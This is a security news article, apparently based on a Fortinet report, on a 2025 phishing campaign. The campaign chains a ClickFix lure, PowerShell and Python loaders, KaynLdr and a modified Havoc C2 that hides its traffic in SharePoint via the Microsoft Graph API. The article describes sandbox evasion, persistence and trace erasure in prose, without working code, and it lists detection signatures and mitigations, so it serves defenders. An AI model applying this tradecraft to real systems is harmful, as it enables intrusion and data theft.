A sophisticated phishing campaign in which threat actors are utilizing a multi-stage attack chain that combines social engineering tactics with modified open-source tools to compromise Windows systems.
The campaign, active as of March 2025, employs the ClickFix technique to deceive users into executing malicious code. It ultimately deploys a customized version of the Havoc command-and-control (C2) framework. This attack highlights evolving threats that blend psychological manipulation with cloud service abuse to evade detection.
The attack begins with a phishing email masquerading as an urgent document notification. Attached to these emails is an HTML file named Documents.html, which displays a fabricated error message instructing users to copy and paste a PowerShell command into their terminal.
This ClickFix tactic preys on the victim’s willingness to resolve apparent technical issues, bypassing traditional file-based detection methods.
The embedded PowerShell command retrieves a script from a SharePoint URL controlled by the attackers. This script (payload_20250112_074319.ps1) performs anti-analysis checks, including verifying the number of domain computers to detect sandbox environments.
.webp)
It then establishes persistence by deleting registry entries HKCU:SoftwareMicrosoft and marking the system with a unique infection identifier.
If the environment passes the sandbox checks, the script checks for the presence of pythonw.exe. If absent, it downloads a Python interpreter before executing a remote Python shellcode loader (payload_20250107_015913.py).
The loader, written partially in Russian, allocates memory, writes shellcode, and executes it to deploy the next stage: KaynLdr, a reflective shellcode loader sourced from GitHub. KaynLdr uses API hashing and direct memory manipulation to load a malicious DLL without leaving disk artifacts1.
Havoc Demon DLL & SharePoint C2 Infrastructure
The final payload is a modified version of Havoc, an open-source post-exploitation framework akin to Cobalt Strike. Unlike standard Havoc implementations, this variant uses Microsoft Graph API endpoints to communicate with attacker-controlled SharePoint files, blending malicious traffic with legitimate cloud service requests.
The malware creates two files in SharePoint’s default document library:
{VictimID}pD9-tKoutfor sending encrypted data from the victim{VictimID}pD9-tKinfor receiving commands1.
During the CheckIn phase, the malware transmits system metadata hostname, IP address, OS details, and privilege status—encrypted using AES-256-CTR with a randomly generated key.
Commands are retrieved via SharePoint API calls, and responses are erased immediately after retrieval to minimize forensic footprints, reads Fortinet report.
By embedding C2 logic within Microsoft Graph API interactions, attackers exploit the trust associated with SharePoint and Office 365 services.
The use of AES encryption and HTTPS traffic further complicates network-based detection. FortiGuard researchers note that the malware supports over 50 commands, including file exfiltration, lateral movement, and Kerberos ticket manipulation, mirroring capabilities in Havoc’s public repository.
Mitigations
Fortinet has issued signatures to block components across the attack chain:
HTML/Agent.A5D4!trfor the initial phishing HTMLPowerShell/MalwThreat!ebc5FTandPython/Agent.DF60!trfor subsequent scriptsW64/Havoc.L!trfor the Havoc payload.
The firm’s Content Disarm and Reconstruction (CDR) service neutralizes malicious macros, while the Backdoor.Havoc.Agent IPS signature targets C2 communications. Organizations are advised to:
- Train users to recognize social engineering lures involving terminal commands
- Monitor SharePoint for anomalous file creation patterns
- Restrict PowerShell execution in non-admin contexts.
As open-source offensive frameworks like Havoc gain traction, continuous monitoring of API-driven cloud platforms becomes critical to identifying stealthy C2 channels.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.